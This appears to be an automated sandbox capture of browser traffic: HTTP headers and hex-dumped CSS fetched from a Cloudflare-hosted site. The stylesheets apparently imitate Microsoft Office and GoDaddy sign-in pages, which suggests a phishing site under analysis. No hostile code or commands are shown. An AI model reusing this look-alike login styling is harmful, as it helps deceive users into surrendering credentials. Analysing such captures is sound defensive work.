                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC144INData Raw: 6b 20 2e 73 70 65 63 74 72 75 6d 2d 41 63 74 69 6f 6e 42 75 74 74 6f 6e 2d 2d 71 75 69 65 74 3a 61 63 74 69 76 65 2c 2e 75 74 69 6c 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 70 65 63 74 72 75 6d 2d 2d 64 61 72 6b 20 2e 73 70 65 63 74 72 75 6d 2d 54 6f 6f 6c 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 61 34 61 34 61 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 34 61 34 61 34 61 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 7d 2e 75 74 69 6c 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 70 65 63 74 72 75 6d 2d 2d 64 61 72 6b 20 2e 73 70 65 63 74 72 75 6d 2d 41 63 74 69 6f 6e 42 75 74 74 6f 6e 2d 2d 71 75 69 65 74 2e 69 73 2d 64 69 73 61 62 6c 65 64 2c 2e 75 74 69 6c 6e 61 76 2d
                                                                                                                                                                                                                                                                                                              Data Ascii: k .spectrum-ActionButton--quiet:active,.utilnav-container .spectrum--dark .spectrum-Tool:active{background-color:#4a4a4a;border-color:#4a4a4a;color:#fff;box-shadow:none}.utilnav-container .spectrum--dark .spectrum-ActionButton--quiet.is-disabled,.utilnav-
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC160INData Raw: 74 72 75 6d 2d 44 69 61 6c 6f 67 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 61 75 74 6f 3b 2d 77 65 62 6b 69 74 2d 6f 76 65 72 66 6c 6f 77 2d 73 63 72 6f 6c 6c 69 6e 67 3a 74 6f 75 63 68 3b 2d 6d 73 2d 66 6c 65 78 3a 31 20 31 20 61 75 74 6f 3b 66 6c 65 78 3a 31 20 31 20 61 75 74 6f 3b 6f 75 74 6c 69 6e 65 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 2c 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61
                                                                                                                                                                                                                                                                                                              Data Ascii: trum-Dialog-content{display:block;box-sizing:border-box;overflow-y:auto;-webkit-overflow-scrolling:touch;-ms-flex:1 1 auto;flex:1 1 auto;outline:0;font-size:14px;font-weight:400;line-height:1.5}@media screen and (-ms-high-contrast:active),(-ms-high-contra
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC176INData Raw: 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 70 65 63 74 72 75 6d 2d 4d 65 6e 75 2d 69 74 65 6d 20 2e 73 70 65 63 74 72 75 6d 2d 4d 65 6e 75 2d 69 74 65 6d 49 63 6f 6e 7b 2d 6d 73 2d 66 6c 65 78 2d 6e 65 67 61 74 69 76 65 3a 30 3b 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 30 3b 2d 6d 73 2d 66 6c 65 78 2d 69 74 65 6d 2d 61 6c 69 67 6e 3a 73 74 61 72 74 3b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 73 74 61 72 74 7d 2e 75 74 69 6c 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 70 65 63 74 72 75 6d 2d 4d 65 6e 75 2d 69 74 65 6d 20 2e 73 70 65 63 74 72 75 6d 2d 49 63 6f 6e 2b 2e 73 70 65 63 74 72 75 6d 2d 4d 65 6e 75 2d 69 74 65 6d 4c 61 62 65 6c 2c 2e 75 74 69 6c 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 70 65 63 74 72 75 6d 2d 4d 65 6e 75 2d 69 74 65 6d 20
                                                                                                                                                                                                                                                                                                              Data Ascii: -container .spectrum-Menu-item .spectrum-Menu-itemIcon{-ms-flex-negative:0;flex-shrink:0;-ms-flex-item-align:start;align-self:flex-start}.utilnav-container .spectrum-Menu-item .spectrum-Icon+.spectrum-Menu-itemLabel,.utilnav-container .spectrum-Menu-item


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              60104.21.0.95443192.168.2.1649792C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC695INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:39 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Last-Modified: Thu, 19 Oct 2023 20:07:07 GMT
                                                                                                                                                                                                                                                                                                              ETag: W/"461-608174cea5712"
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nA1O%2FYY6Lsv7QC2rjnrhqXzxHt8vx%2BFbo%2Fb23TqY%2BxSvWPiaHr699%2Bh818TP52qVBsFLwIP%2BenwlGx6bVt1DSYW5Fo0PWGaN%2BQcXKkGGhE9tmpdoJLLzK7bBWDHoeOuV0o%2FWLRa3m2OC7MY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd4032a57571c-IAD
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC696INData Raw: 34 36 31 0d 0a 62 6f 64 79 2e 73 74 61 72 74 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 32 66 32 66 32 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 62 61 63 6b 67 72 6f 75 6e 64 73 2f 32 5f 31 31 64 39 65 33 62 63 64 66 65 64 65 39 63 65 35 63 65 35 61 63 65 32 64 31 32 39 66 31 63 34 2e 73 76 67 27 29 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 2c 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e
                                                                                                                                                                                                                                                                                                              Data Ascii: 461body.start { background-color: #f2f2f2; background-image: url('https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg'); background-repeat: no-repeat,no-repeat; backgroun
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC696INData Raw: 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 36 37 62 38 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 35 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 3b 0a 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 62 74 6e 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 36 37 62 38 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 66 69 72 73 74 6c 6f 67 6f 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 2f 77 65 62 35 2f 61 73 73 65 74 73 2f 6f 66 66 69 63 65 6c 6f 67 6f 2e 70 6e 67 22 29 3b 0a 20 20 20 20 20 20 20 20 62
                                                                                                                                                                                                                                                                                                              Data Ascii: rder: 2px solid #0067b8; padding: 5px 30px; font-size: 15px; cursor: pointer; } .btn:hover { background-color: #0067b8; } .firstlogo{ background-image: url("/web5/assets/officelogo.png"); b
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC697INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              61104.21.0.95443192.168.2.1649794C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC697INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:39 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Last-Modified: Thu, 24 Aug 2023 12:07:13 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0-603aa11867866"
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KPslo85CQH941H3jPahJcUAasM8tUp69REm1%2BmWZ7l5d6NOM8x5%2BHfQUAwPPUF%2BuRv1%2FP1ZSA4n4cUKkdSRoOTMeZbQh940P56Yaa0AjGs05PKAfbVrw1XVc7w966mBH3uGYiVecOOrRnTg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd4037c585866-IAD


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              62104.21.0.95443192.168.2.1649795C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC698INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:39 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 16 Oct 2023 23:11:45 GMT
                                                                                                                                                                                                                                                                                                              ETag: W/"954d-607dd87afc16b"
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3Q8AKAaKQBn%2BIjfFVq5itz10nsIygvITDfpreY%2BlmI%2BWpoMy5xVvuUhCs3QfyRNwP7O6Zp2SUEulBiAPnZtQV4C8dfR5iB%2Fw9tzGQtcEZ12vpjkxDzHNAvKowzLsz5RbChPjK1KB%2Boi6wYQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd4036b442d15-IAD
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC699INData Raw: 37 63 32 65 0d 0a 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 67 64 73 68 65 72 70 61 27 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 73 72 63 3a 20 75 72 6c 28 27 2f 77 65 62 35 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 62 6f 6c 64 2e 77 6f 66 66 32 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 2c 75 72 6c 28 27 2f 77 65 62 35 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 62 6f 6c 64 2e 77 6f 66 66 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 2d 31 30 46 46 46 46 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20
                                                                                                                                                                                                                                                                                                              Data Ascii: 7c2e@font-face{font-family: 'gdsherpa';font-weight: 700;src: url('/web5/assets/fonts/GDSherpa-bold.woff2') format('woff2'),url('/web5/assets/fonts/GDSherpa-bold.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family:
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC699INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 31 20 39 39 39 3b 73 72 63 3a 20 75 72 6c 28 27 2f 77 65 62 35 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 76 66 2e 77 6f 66 66 32 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 2c 75 72 6c 28 27 2f 77 65 62 35 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 76 66 2e 77 6f 66 66 32 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 2d 76 61 72 69 61 74 69 6f 6e 73 27 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 2d 31 30 46 46 46 46 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 67 64 73 68 65 72 70 61 27 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 31 20 39 30 30 3b 73 72
                                                                                                                                                                                                                                                                                                              Data Ascii: nt-weight: 1 999;src: url('/web5/assets/fonts/GDSherpa-vf.woff2') format('woff2'),url('/web5/assets/fonts/GDSherpa-vf.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 900;sr
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC701INData Raw: 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 74 30 6b 68 6d 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 73 76 67 20 7b 0d 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 75 6e 73 65 74 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 62 75 74 74 6f 6e 20 7b 0d 0a 20 20 2d 2d 75 78 2d 62 75 74 74 6f 6e 2d 69 63 6f 6e 2d 6d 61 72 67 69 6e 3a 20 63 61 6c 63 28 28 76 61 72 28 2d 2d 75 78 2d 74 33 37 39 6f 76 2c 76 61 72 28 2d 2d 75 78 2d 6a 77 35 73 39 6a 2c 31 2e 35 29 29 20 2a 20 31 65 6d 20 2d 20 31 2e 35 65 6d 29 20 2f 20 32 29 3b 0d 0a 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: ext-decoration: var(--ux-1ft0khm,underline);}#sections_godaddy svg { overflow: hidden; vertical-align: unset;}#sections_godaddy .ux-button { --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC702INData Raw: 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 73 70 61 63 65 2e 75 78 2d 73 70 61 63 65 2d 2d 69 6e 6c 69 6e 65 3a 65 6d 70 74 79 20 7b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 0d 0a 20 20 69 6e 6c 69 6e 65 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 75 78 53 70 61 63 65 2d 2d 70 61 64 64 69 6e 67 2d 73 69 7a 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 73 70 61 63 65 2e 75 78 2d 73 70 61 63 65 2d 2d 69 6e 6c 69 6e 65 3a 6e 6f 74 28 3a 65 6d 70 74 79 29 20 7b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 69 6e 6c 69 6e 65 3a 20 76 61 72 28 2d 2d 75 78 53 70 61 63 65 2d 2d 70 61 64 64 69 6e 67 2d 73 69 7a 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73
                                                                                                                                                                                                                                                                                                              Data Ascii: );}#sections_godaddy .ux-space.ux-space--inline:empty { display: inline-flex; inline-size: var(--uxSpace--padding-size);}#sections_godaddy .ux-space.ux-space--inline:not(:empty) { padding-inline: var(--uxSpace--padding-size);}#s
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC703INData Raw: 66 6f 6e 74 53 69 7a 65 2d 31 29 20 76 61 72 28 2d 2d 75 78 2d 6f 6c 30 37 30 33 2c 2f 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 31 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 30 29 20 76 61 72 28 2d 2d 75 78 2d 79 34 70 67 38 7a 2c 2a 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 32 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 31 29 20 76 61 72 28 2d 2d 75 78 2d 79 34 70 67 38 7a 2c 2a 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: fontSize-1) var(--ux-ol0703,/) var(--ux-7s4p3v,1.125)); --uxText--fontSize1: calc(var(--uxText--fontSize0) var(--ux-y4pg8z,*) var(--ux-7s4p3v,1.125)); --uxText--fontSize2: calc(var(--uxText--fontSize1) var(--ux-y4pg8z,*) var(--ux-7s4p3v,1.125));
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC705INData Raw: 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 61 6c 65 72 74 20 61 5b 68 72 65 66 5d 20 7b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 69 6e 68 65 72 69 74 3b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 74 65 78 74 2d 65 6e 74 72 79 2d 66 69 65 6c 64 2c 20 2e 75 78 2d 74 65 78 74 2d 65 6e 74 72 79 2d 73 75 67 67 65 73 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 67 64 73 68 65 72 70 61 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 61 6c 65 72 74 20 73 76 67 20 7b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 63 75 72 72 65 6e 74 43 6f 6c
                                                                                                                                                                                                                                                                                                              Data Ascii: ns_godaddy .ux-alert a[href] { color: inherit; display: inline;}#sections_godaddy .ux-text-entry-field, .ux-text-entry-suggestion { font-family: gdsherpa; font-weight: 500;}#sections_godaddy .ux-alert svg { color: currentCol
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC706INData Raw: 61 72 3a 20 62 6f 74 68 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 64 2d 66 6c 65 78 20 7b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 66 6c 65 78 2d 72 6f 77 20 7b 0d 0a 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 72 6f 77 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 65 6e 64 20 7b 0d 0a 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 66 6c 65 78 2d 65 6e 64 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 73
                                                                                                                                                                                                                                                                                                              Data Ascii: ar: both;}#sections_godaddy .d-flex { display: flex!important;}#sections_godaddy .flex-row { flex-direction: row!important;}#sections_godaddy .justify-content-end { justify-content: flex-end!important;}#sections_godaddy .s
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC707INData Raw: 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 69 6e 68 65 72 69 74 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 69 6e 68 65 72 69 74 3b 0d 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 69 6e 68 65 72 69 74 3b 0d 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 76 69 73 69 62 6c 65 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 62 75 74 74 6f 6e 2c 68 74 6d 6c 20 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 20 7b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 20 62 75 74 74 6f 6e 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 69 6e 70 75 74 5b 74 79 70 65 3d 63 68 65 63 6b 62 6f 78 5d 20 7b 0d 0a 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 70 61 64 64
                                                                                                                                                                                                                                                                                                              Data Ascii: ont-family: inherit; font-size: inherit; line-height: inherit; overflow: visible;}#sections_godaddy button,html [type=button] { -webkit-appearance: button;}#sections_godaddy input[type=checkbox] { box-sizing: border-box; padd
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC709INData Raw: 64 61 64 64 79 20 2e 63 61 72 64 2d 62 6c 6f 63 6b 20 7b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 2d 31 73 62 66 69 67 38 2c 2e 32 35 72 65 6d 29 20 2a 20 35 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 63 61 72 64 20 7b 0d 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 76 61 72 28 2d 2d 75 78 2d 32 6a 75 62 65 73 2c 32 70 78 29 3b 0d 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 2d 31 73 62 66 69 67 38 2c 2e 32 35 72 65 6d 29 20 2a 20 35 29 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 31 6c 65 79 6e 73 6d 2c 23 30 30 30 29 3b 0d 0a 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d
                                                                                                                                                                                                                                                                                                              Data Ascii: daddy .card-block { padding: calc(var(--ux-1sbfig8,.25rem) * 5);}#sections_godaddy .ux-card { border-radius: var(--ux-2jubes,2px); margin: 0 0 calc(var(--ux-1sbfig8,.25rem) * 5); color: var(--ux-1leynsm,#000); border: 1px solid var(--
